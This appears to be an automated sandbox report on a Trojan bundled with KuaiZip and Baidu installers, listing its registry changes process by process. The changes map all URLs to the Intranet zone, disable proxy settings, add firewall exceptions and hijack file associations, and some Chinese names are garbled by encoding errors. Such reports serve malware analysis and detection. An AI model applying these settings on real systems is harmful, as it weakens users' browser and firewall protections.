[HKCU\Software\KuaiZipSFX\Ãƒâ€šÃ‚Â¿ÃƒÆ’Ã‚Â¬ÃƒÆ’Ã¢â‚¬ËœÃƒâ€šÃ‚Â¹\Files]
"ZipNew.dat" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCR\.kz\ShellNew]
"FileName" = "%Program Files%\Ãƒâ€šÃ‚Â¿ÃƒÆ’Ã‚Â¬ÃƒÆ’Ã¢â‚¬ËœÃƒâ€šÃ‚Â¹\KzNew.dat"

[HKCU\Software\KuaiZipSFX\Ãƒâ€šÃ‚Â¿ÃƒÆ’Ã‚Â¬ÃƒÆ’Ã¢â‚¬ËœÃƒâ€šÃ‚Â¹\Files\X86]
"KZModule.dll" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\KuaiZip\Install]
"qid" = "7654_1061607"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\KuaiZipSFX\Ãƒâ€šÃ‚Â¿ÃƒÆ’Ã‚Â¬ÃƒÆ’Ã¢â‚¬ËœÃƒâ€šÃ‚Â¹\Files\X86\sfx]
"kzSetup_chs.sfx" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\KuaiZipSFX\Ãƒâ€šÃ‚Â¿ÃƒÆ’Ã‚Â¬ÃƒÆ’Ã¢â‚¬ËœÃƒâ€šÃ‚Â¹\Files\X86]
"KuaiZipDrive.sys" = "0"

[HKCU\Software\KuaiZipSFX\Ãƒâ€šÃ‚Â¿ÃƒÆ’Ã‚Â¬ÃƒÆ’Ã¢â‚¬ËœÃƒâ€šÃ‚Â¹\Files\data]
"slimdata.dat" = "0"

[HKCU\Software\KuaiZipSFX\Ãƒâ€šÃ‚Â¿ÃƒÆ’Ã‚Â¬ÃƒÆ’Ã¢â‚¬ËœÃƒâ€šÃ‚Â¹\Files]
"ErrorMsg.xml" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKCU\Software\KuaiZip\Install]
"Version" = "2.8.2.3"

[HKCU\Software\KuaiZip\KuaiZip\Profiles\0]
"Default" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process YouQian_Setup.exe:1312 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C8 2B 8D F7 98 0E C2 36 8C 3A 89 3C 9E 91 19 82"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

The process KuaiZip.exe:4052 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D7 9A E7 72 36 28 28 5D 4F EF 69 12 DD 3B 3D 80"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

The process Update.exe:3744 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKCU\Software\KuaiZip\KuaiZip\Update]
"virgin" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 2B 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8D E4 CC 67 C5 31 F8 9B 26 8A 30 DA 1D 93 38 07"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\KuaiZip\KuaiZip\Update]
"FirstInstTime" = "80 13 AF AE 27 28 D1 01"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process Baidu.exe:656 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "32 BE 27 B6 5E 9F E9 72 4B C0 C3 D9 53 40 0A 5A"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"

Adds a rule to the firewall Windows which allows any network activity:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359]
"BaiduUpdate.exe" = "%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\BaiduUpdate.exe:*:Enabled:BaiduUpdate.exe"

The Trojan adds process executable file it works in to the list of trusted Windows Firewall applications:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List\%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359]
"BaiduUpdate.exe" = "%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\BaiduUpdate.exe:*:Enabled:BaiduUpdate.exe"

Adds a rule to the firewall Windows which allows any network activity:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359]
"baidu.exe" = "%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\Baidu.exe:*:Enabled:Baidu.exe"

The Trojan adds process executable file it works in to the list of trusted Windows Firewall applications:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List\%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359]
"BaiduBugRpt.exe" = "%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\BaiduBugRpt.exe:*:Enabled:BaiduBugRpt.exe"

Adds a rule to the firewall Windows which allows any network activity:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359]
"BaiduBugRpt.exe" = "%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\BaiduBugRpt.exe:*:Enabled:BaiduBugRpt.exe"

The Trojan adds process executable file it works in to the list of trusted Windows Firewall applications:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List\%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359]
"baidu.exe" = "%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\Baidu.exe:*:Enabled:Baidu.exe"

The process Baidu.exe:2568 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8C FA BF 51 9C 32 50 C7 32 37 5F F7 1E BF 77 54"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"

The process Baidu.exe:1412 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "25 44 91 97 6A C4 68 CA AF 0A 43 8B 45 FE 38 A3"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

The process Baidu.exe:3816 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D4 90 8A 15 04 D2 7D 52 59 92 85 89 3D CB FD 17"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"

The process Baidu.exe:1988 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C1 17 D3 04 C0 60 B3 E2 91 E5 5D 8E 6F 6E 58 6B"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359]
"BaiduUpdate.exe" = "ÃƒÂ¦Ã‚Â¡Ã…â€™ÃƒÂ©Ã‚ÂÃ‚Â¢ÃƒÂ§Ã¢â€žÂ¢Ã‚Â¾ÃƒÂ¥Ã‚ÂºÃ‚Â¦ÃƒÂ¥Ã‚ÂÃ¢â‚¬Â¡ÃƒÂ§Ã‚ÂºÃ‚Â§ÃƒÂ§Ã‚Â¨Ã¢â‚¬Â¹ÃƒÂ¥Ã‚ÂºÃ‚Â"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
"Recent" = "%Documents and Settings%\%current user%\Recent"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The process KZMount.exe:3708 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKCR\KuaiZipMount.vcd\DefaultIcon]
"(Default)" = "%Program Files%\Ãƒâ€šÃ‚Â¿ÃƒÆ’Ã‚Â¬ÃƒÆ’Ã¢â‚¬ËœÃƒâ€šÃ‚Â¹\X86\KZMount.exe,0"

[HKCR\KuaiZipMount.nrg\shell\open\command]
"(Default)" = "%Program Files%\Ãƒâ€šÃ‚Â¿ÃƒÆ’Ã‚Â¬ÃƒÆ’Ã¢â‚¬ËœÃƒâ€šÃ‚Â¹\X86\KZMount.exe -NewDriver %1"

[HKCR\KuaiZipMount.cue\DefaultIcon]
"(Default)" = "%Program Files%\Ãƒâ€šÃ‚Â¿ÃƒÆ’Ã‚Â¬ÃƒÆ’Ã¢â‚¬ËœÃƒâ€šÃ‚Â¹\X86\KZMount.exe,0"

[HKCR\KuaiZipMount.isz\shell\open\command]
"(Default)" = "%Program Files%\Ãƒâ€šÃ‚Â¿ÃƒÆ’Ã‚Â¬ÃƒÆ’Ã¢â‚¬ËœÃƒâ€šÃ‚Â¹\X86\KZMount.exe -NewDriver %1"

[HKCR\KuaiZipMount.mds\DefaultIcon]
"(Default)" = "%Program Files%\Ãƒâ€šÃ‚Â¿ÃƒÆ’Ã‚Â¬ÃƒÆ’Ã¢â‚¬ËœÃƒâ€šÃ‚Â¹\X86\KZMount.exe,0"

[HKCR\KuaiZipMount.flac\DefaultIcon]
"(Default)" = "%Program Files%\Ãƒâ€šÃ‚Â¿ÃƒÆ’Ã‚Â¬ÃƒÆ’Ã¢â‚¬ËœÃƒâ€šÃ‚Â¹\X86\KZMount.exe,0"

[HKCR\KuaiZipMount.bin\shell\open\command]
"(Default)" = "%Program Files%\Ãƒâ€šÃ‚Â¿ÃƒÆ’Ã‚Â¬ÃƒÆ’Ã¢â‚¬ËœÃƒâ€šÃ‚Â¹\X86\KZMount.exe -NewDriver %1"

[HKCR\KuaiZipMount_FileAsso.Origin\.isz]
"(Default)" = "NoAssociate.KuaiZipMount"

[HKCR\.wv]
"(Default)" = "KuaiZipMount.wv"

[HKCR\KuaiZipMount_FileAsso.Origin\.bin]
"(Default)" = ""

[HKCR\KuaiZipMount_FileAsso.Origin\.ape]
"(Default)" = "NoAssociate.KuaiZipMount"

[HKCR\KuaiZipMount.nrg\DefaultIcon]
"(Default)" = "%Program Files%\Ãƒâ€šÃ‚Â¿ÃƒÆ’Ã‚Â¬ÃƒÆ’Ã¢â‚¬ËœÃƒâ€šÃ‚Â¹\X86\KZMount.exe,0"

[HKCR\.ape]
"(Default)" = "KuaiZipMount.ape"

[HKCR\KuaiZipMount.vcd\shell\open\command]
"(Default)" = "%Program Files%\Ãƒâ€šÃ‚Â¿ÃƒÆ’Ã‚Â¬ÃƒÆ’Ã¢â‚¬ËœÃƒâ€šÃ‚Â¹\X86\KZMount.exe -NewDriver %1"

[HKCR\KuaiZipMount.mdf\DefaultIcon]
"(Default)" = "%Program Files%\Ãƒâ€šÃ‚Â¿ÃƒÆ’Ã‚Â¬ÃƒÆ’Ã¢â‚¬ËœÃƒâ€šÃ‚Â¹\X86\KZMount.exe,0"

[HKCR\.bin]
"(Default)" = "KuaiZipMount.bin"

[HKCR\.ccd]
"(Default)" = "KuaiZipMount.ccd"

[HKCR\KuaiZipMount_FileAsso.Origin\.ccd]
"(Default)" = "NoAssociate.KuaiZipMount"

[HKCR\KuaiZipMount.ccd\shell\open\command]
"(Default)" = "%Program Files%\Ãƒâ€šÃ‚Â¿ÃƒÆ’Ã‚Â¬ÃƒÆ’Ã¢â‚¬ËœÃƒâ€šÃ‚Â¹\X86\KZMount.exe -NewDriver %1"

[HKCR\KuaiZipMount.iso\shell\open\command]
"(Default)" = "%Program Files%\Ãƒâ€šÃ‚Â¿ÃƒÆ’Ã‚Â¬ÃƒÆ’Ã¢â‚¬ËœÃƒâ€šÃ‚Â¹\X86\KZMount.exe -NewDriver %1"

[HKCR\KuaiZipMount_FileAsso.Origin\.mds]
"(Default)" = "NoAssociate.KuaiZipMount"

[HKCR\KuaiZipMount_FileAsso.Origin\.wv]
"(Default)" = "NoAssociate.KuaiZipMount"

[HKCR\KuaiZipMount.mdf\shell\open\command]
"(Default)" = "%Program Files%\Ãƒâ€šÃ‚Â¿ÃƒÆ’Ã‚Â¬ÃƒÆ’Ã¢â‚¬ËœÃƒâ€šÃ‚Â¹\X86\KZMount.exe -NewDriver %1"

[HKCR\KuaiZipMount.ape\shell\open\command]
"(Default)" = "%Program Files%\Ãƒâ€šÃ‚Â¿ÃƒÆ’Ã‚Â¬ÃƒÆ’Ã¢â‚¬ËœÃƒâ€šÃ‚Â¹\X86\KZMount.exe -NewDriver %1"

[HKCR\KuaiZipMount_FileAsso.Origin\.iso]
"(Default)" = "NoAssociate.KuaiZipMount"

[HKCR\.vcd]
"(Default)" = "KuaiZipMount.vcd"

[HKCR\.mds]
"(Default)" = "KuaiZipMount.mds"

[HKCR\.cue]
"(Default)" = "KuaiZipMount.cue"

[HKCR\KuaiZipMount_FileAsso.Origin\.vcd]
"(Default)" = "NoAssociate.KuaiZipMount"

[HKCR\KuaiZipMount.mds\shell\open\command]
"(Default)" = "%Program Files%\Ãƒâ€šÃ‚Â¿ÃƒÆ’Ã‚Â¬ÃƒÆ’Ã¢â‚¬ËœÃƒâ€šÃ‚Â¹\X86\KZMount.exe -NewDriver %1"

[HKCR\KuaiZipMount.bin\DefaultIcon]
"(Default)" = "%Program Files%\Ãƒâ€šÃ‚Â¿ÃƒÆ’Ã‚Â¬ÃƒÆ’Ã¢â‚¬ËœÃƒâ€šÃ‚Â¹\X86\KZMount.exe,0"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DE 4C D7 CC 0E 5E 5C C5 1B 09 CE 26 A5 8F 00 DD"

[HKCR\KuaiZipMount.iso\DefaultIcon]
"(Default)" = "%Program Files%\Ãƒâ€šÃ‚Â¿ÃƒÆ’Ã‚Â¬ÃƒÆ’Ã¢â‚¬ËœÃƒâ€šÃ‚Â¹\X86\KZMount.exe,0"

[HKCR\.flac]
"(Default)" = "KuaiZipMount.flac"

[HKCR\KuaiZipMount.wv\shell\open\command]
"(Default)" = "%Program Files%\Ãƒâ€šÃ‚Â¿ÃƒÆ’Ã‚Â¬ÃƒÆ’Ã¢â‚¬ËœÃƒâ€šÃ‚Â¹\X86\KZMount.exe -NewDriver %1"

[HKCR\KuaiZipMount_FileAsso.Origin\.flac]
"(Default)" = "NoAssociate.KuaiZipMount"

[HKCR\KuaiZipMount.cue\shell\open\command]
"(Default)" = "%Program Files%\Ãƒâ€šÃ‚Â¿ÃƒÆ’Ã‚Â¬ÃƒÆ’Ã¢â‚¬ËœÃƒâ€šÃ‚Â¹\X86\KZMount.exe -NewDriver %1"

[HKCR\.iso]
"(Default)" = "KuaiZipMount.iso"

[HKCR\KuaiZipMount_FileAsso.Origin\.nrg]
"(Default)" = "NoAssociate.KuaiZipMount"

[HKCR\KuaiZipMount.wv\DefaultIcon]
"(Default)" = "%Program Files%\Ãƒâ€šÃ‚Â¿ÃƒÆ’Ã‚Â¬ÃƒÆ’Ã¢â‚¬ËœÃƒâ€šÃ‚Â¹\X86\KZMount.exe,0"

[HKCR\KuaiZipMount_FileAsso.Origin\.mdf]
"(Default)" = "NoAssociate.KuaiZipMount"

[HKCR\KuaiZipMount.ccd\DefaultIcon]
"(Default)" = "%Program Files%\Ãƒâ€šÃ‚Â¿ÃƒÆ’Ã‚Â¬ÃƒÆ’Ã¢â‚¬ËœÃƒâ€šÃ‚Â¹\X86\KZMount.exe,0"

[HKCR\.mdf]
"(Default)" = "KuaiZipMount.mdf"

[HKCR\.isz]
"(Default)" = "KuaiZipMount.isz"

[HKCR\KuaiZipMount.isz\DefaultIcon]
"(Default)" = "%Program Files%\Ãƒâ€šÃ‚Â¿ÃƒÆ’Ã‚Â¬ÃƒÆ’Ã¢â‚¬ËœÃƒâ€šÃ‚Â¹\X86\KZMount.exe,0"

[HKCR\KuaiZipMount_FileAsso.Origin\.cue]
"(Default)" = "NoAssociate.KuaiZipMount"

[HKCR\KuaiZipMount.ape\DefaultIcon]
"(Default)" = "%Program Files%\Ãƒâ€šÃ‚Â¿ÃƒÆ’Ã‚Â¬ÃƒÆ’Ã¢â‚¬ËœÃƒâ€šÃ‚Â¹\X86\KZMount.exe,0"

[HKCR\KuaiZipMount.flac\shell\open\command]
"(Default)" = "%Program Files%\Ãƒâ€šÃ‚Â¿ÃƒÆ’Ã‚Â¬ÃƒÆ’Ã¢â‚¬ËœÃƒâ€šÃ‚Â¹\X86\KZMount.exe -NewDriver %1"

[HKCR\.nrg]
"(Default)" = "KuaiZipMount.nrg"

The process KZMount.exe:3484 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "14 31 10 A8 BC F1 7F 64 2F 9D 94 83 6D 93 E2 05"

The process %original file name%.exe:1612 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 28 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7D 5B 01 BA A1 53 0E 14 4B F4 ED AC 1D 39 28 D2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

